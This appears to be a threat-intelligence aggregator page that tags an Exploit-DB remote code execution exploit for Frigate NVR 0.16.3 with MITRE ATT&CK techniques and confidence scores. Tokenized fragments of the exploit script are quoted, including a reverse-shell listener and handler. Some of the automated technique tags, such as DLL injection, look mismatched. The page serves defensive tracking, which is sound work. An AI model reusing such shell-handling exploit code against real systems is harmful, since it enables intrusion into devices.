TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Exploit-DB

[webapps] Frigate NVR 0.16.3 - Remote Code Execution

6 days ago · Read original ↗

ATT&CK techniques detected

6 predictions
T1190Exploit Public-Facing Application
93%
“[ webapps ] frigate nvr 0. 16. 3 - remote code execution frigate nvr 0. 16. 3 - remote code execution # exploit title : frigate nvr 0. 16. 3 - remote code execution # date : 2026 - 02 - 05 # exploit author : jduardo2704 # vendor homepage : https : / / frigate. video / # software …”
T1059.004Unix Shell
90%
“, " " ) output = output. replace ( " bash : no job control in this shell \ n ", " " ) sys. stdout. write ( output ) sys. stdout. flush ( ) if sys. stdin in r : cmd = sys. stdin. readline ( ) conn. send ( cmd. encode ( ) ) except socket. timeout : print _ status ( " exploit sent b…”
T1055.001Dynamic-link Library Injection
76%
“, args. lport ) ) exploit _ thread. daemon = true exploit _ thread. start ( ) shell _ handler ( args. lport ) if _ _ name _ _ = = " _ _ main _ _ " : main ( )”
T1059.004Unix Shell
73%
“green, " [ + ] " ) print ( f " { yellow } - - - shell established - - - \ n { reset } " ) s. settimeout ( none ) conn. settimeout ( none ) while true : r, _, _ = select. select ( [ sys. stdin, conn ], [ ], [ ] ) if conn in r : data = conn. recv ( 4096 ) if not data : break # clea…”
T1190Exploit Public-Facing Application
62%
“. insecurerequestwarning ) # colors green = ' \ 033 [ 92m ' yellow = ' \ 033 [ 93m ' red = ' \ 033 [ 91m ' blue = ' \ 033 [ 94m ' reset = ' \ 033 [ 0m ' # event to synchronize the listener with the exploit thread exploit _ ready = threading. event ( ) def print _ status ( msg, co…”
T1190Exploit Public-Facing Application
38%
“', ' - - url ', required = true, help = " target url " ) parser. add _ argument ( ' - u ', ' - - username ', required = false, help = " username ( optional ) " ) parser. add _ argument ( ' - p ', ' - - password ', required = false, help = " password ( optional ) " ) parser. add _…”

Summary

Frigate NVR 0.16.3 - Remote Code Execution